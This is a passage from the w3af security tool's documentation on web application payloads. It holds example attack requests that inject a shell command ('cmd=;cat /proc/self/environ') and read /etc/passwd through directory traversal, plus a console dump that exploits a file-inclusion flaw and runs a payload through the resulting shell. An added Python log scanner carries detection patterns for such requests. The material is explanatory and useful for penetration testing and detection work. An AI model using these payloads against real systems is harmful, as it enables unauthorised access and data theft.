w3af - Web application attack and audit framework Documentation, Release 1.7.6
Until now, the exploitation of these vulnerabilities, and the steps needed to achieve access with a user of elevated
privileges had to be performed manually, which could in many situations take hours (depending on the web application
penetration tester’s skills) and may or may not achieve its objective.
Web Application Payloads are the evolution of the old-school system call payloads that have been used in memory corruption
exploits since the 80s. The basic problem solved by any payload is pretty simple: “I have access, what now?”. In
memory corruption exploits it’s pretty easy to perform arbitrary tasks, because after successful exploitation the attacker
controls the remote CPU and memory, which allows execution of arbitrary operating system calls. With
this power it’s possible to create a new user, run arbitrary commands or upload files.
In the Web Application field the situation is completely different: the intruder is restricted to the “system calls” that
the vulnerable Web Application script exposes. For example:
• Arbitrary File Read Vulnerabilities expose read()
• OS Commanding Vulnerabilities expose exec()
• SQL Injection Vulnerabilities expose read(), write() and potentially exec()
Web Application Payloads are small pieces of code that are run in the intruder’s box and then translated
by the Web Application exploit into a combination of GET and POST requests to be sent to the
remote Web server. For example, a call to the emulated syscall read() with /proc/self/environ
as a parameter would generate this request when it’s run through an arbitrary file read vulnerability:
http://host.tld/read.php?file=/proc/self/environ
And this other request when exploiting an OS Commanding vulnerability:
http://host.tld/os.php?cmd=;cat /proc/self/environ
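The two requests above are also exactly what such a payload leaves behind in the web server's access log. As an added example (not w3af code), the following Python classifies each query parameter of a combined-format access log line by the emulated syscall it suggests, so a defender can spot read() and exec() traffic of this kind; the log lines are constructed, and the regular expressions are assumptions, not w3af's own logic.

```python
"""Classify access-log requests by the emulated syscall (read/exec) they suggest."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Assumed markers: directory traversal or /proc and /etc/passwd reads look like
# an emulated read(); a leading shell separator looks like an emulated exec().
TRAVERSAL_RE = re.compile(r"\.\./|\.\.\\")
SENSITIVE_PATH_RE = re.compile(r"^/proc/|/etc/passwd$")
CMD_SEP_RE = re.compile(r"^\s*[;|&`]|\$\(")

# Combined log format: client ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify(value):
    """Return "exec", "read" or None for one decoded query-parameter value."""
    v = unquote(value)  # second decode catches double-encoded values
    if CMD_SEP_RE.search(v):
        return "exec"
    if TRAVERSAL_RE.search(v) or SENSITIVE_PATH_RE.search(v):
        return "read"
    return None


def scan_log(lines):
    """Return (client, path, parameter, kind) for every suspicious parameter."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        url = urlsplit(m.group("target"))
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            kind = classify(value)
            if kind:
                findings.append((m.group("client"), url.path, name, kind))
    return findings


# Constructed sample log: one benign request, then the three request shapes above.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2014:13:55:36 +0000] "GET /local_file_read.php?file=section.txt HTTP/1.1" 200 512',
    '10.0.0.5 - - [10/Oct/2014:13:55:37 +0000] "GET /local_file_read.php?file=../../../../../../../../etc/passwd HTTP/1.1" 200 1834',
    '10.0.0.5 - - [10/Oct/2014:13:55:38 +0000] "GET /read.php?file=/proc/self/environ HTTP/1.1" 200 2201',
    '10.0.0.5 - - [10/Oct/2014:13:55:39 +0000] "GET /os.php?cmd=%3Bcat%20/proc/self/environ HTTP/1.1" 200 2201',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```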
1.12.2 Running Web Application Payloads
The following is a console dump from w3af scanning a vulnerable application, exploiting a vulnerability and then
running the list_processes payload:
w3af>>> plugins
w3af/plugins>>> audit lfi
w3af/plugins>>> back
w3af>>> target
w3af/config:target>>> set target http://localhost/local_file_read.php?file=section.txt
w3af/config:target>>> back
w3af>>> start
Found 1 URLs and 1 different points of injection.
The list of URLs is:
- http://localhost/local_file_read.php
The list of fuzzable requests is:
- http://localhost/local_file_read.php | Method: GET | Parameters: (file="section.txt")
Starting lfi plugin execution.
Local File Inclusion was found at: "http://localhost/local_file_read.php", using HTTP method GET.
The sent data was: "file=../../../../../../../../etc/passwd".
This vulnerability was found in the request with id 3.
Finished scanning process.
w3af>>> exploit
w3af/exploit>>> exploit local_file_reader
local_file_reader exploit plugin is starting.
- [0] <shell object (rsystem: "*nix")>
Please use the interact command to interact with the shell objects.
w3af/exploit>>> interact 0
Execute "end_interaction" to get out of the remote shell. Commands typed in this menu will
run through the local_file_reader shell
w3af/exploit/local_file_reader-0>>> payload list_processes